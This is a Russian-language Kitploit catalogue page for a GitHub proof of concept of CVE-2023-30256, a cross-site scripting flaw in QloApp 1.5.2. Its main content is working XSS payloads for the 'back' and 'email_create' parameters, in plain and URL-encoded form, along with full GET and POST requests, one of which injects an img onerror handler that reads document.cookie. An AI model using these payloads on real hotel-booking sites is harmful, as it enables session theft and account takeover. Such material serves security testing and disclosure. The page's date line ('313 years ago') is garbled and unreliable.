Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
CVE-2023-30256 — QloApp 1.5.2: Уязвимость к XSS в двух параметрах (email_create и back) | Kitploit
Инструменты/GitHubGitHub/ahrixia/cve-2023-30256
Анализ уязвимостейЭксплуатацияЭксплуатация веб-приложенийВеб-безопасностьТестирование на Проникновение
GitHubahrixia/cve-2023-30256

CVE-2023-30256

QloApp 1.5.2: Уязвимость к XSS в двух параметрах (email_create и back)

Репозиторий
313 лет назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

Webkul Qloapps 1.5.2 - Межсайтовый скриптинг (XSS)

Webkul QloApps 1.5.2: уязвим к XSS в двух параметрах (email_create и back)

Эксплойт - Proof of Concept (POC)

XXS: параметр 'back'

root@kitploit:~
Payload (Parameter back – Plain text): 
[xss onfocus=alert(1) autofocus= xss] 

Payload (Parameter back – URL Encoded): 
[xss%20onfocus%3dalert(1)%20autofocus%3d%20xss]

Full GET Request (Parameter back): 
[http://localhost/hotelcommerce-1.5.2/?rand=1679996611398&controller=authentication&SubmitCreate=1&ajax=true&email_create=a&back=xss%20onfocus%3dalert(1)%20autofocus%3d%20xss&token=6c62b773f1b284ac4743871b300a0c4d]

image info

XXS: параметр 'email_create'

root@kitploit:~
Payload (Parameter email_create – Plain text): 
[xss>xss] 

Payload (Parameter email_create – URL Encoded): 
[xss%3e%3cimg%20src%3da%20onerror%3dalert(document.cookie)%3exss]

POST Request (Parameter email_create) (POST REQUEST DATA ONLY): 
[controller=authentication&SubmitCreate=1&ajax=true&email_create=xss%3e%3cimg%20src%3da%20onerror%3dalert(document.cookie)%3exss&back=my-account&token=6c62b773f1b284ac4743871b300a0c4d]

image info

Подтверждено: 30 марта 2023

Разработчик: QloApps [https://github.com/webkul/hotelcommerce]

Скачать инструмент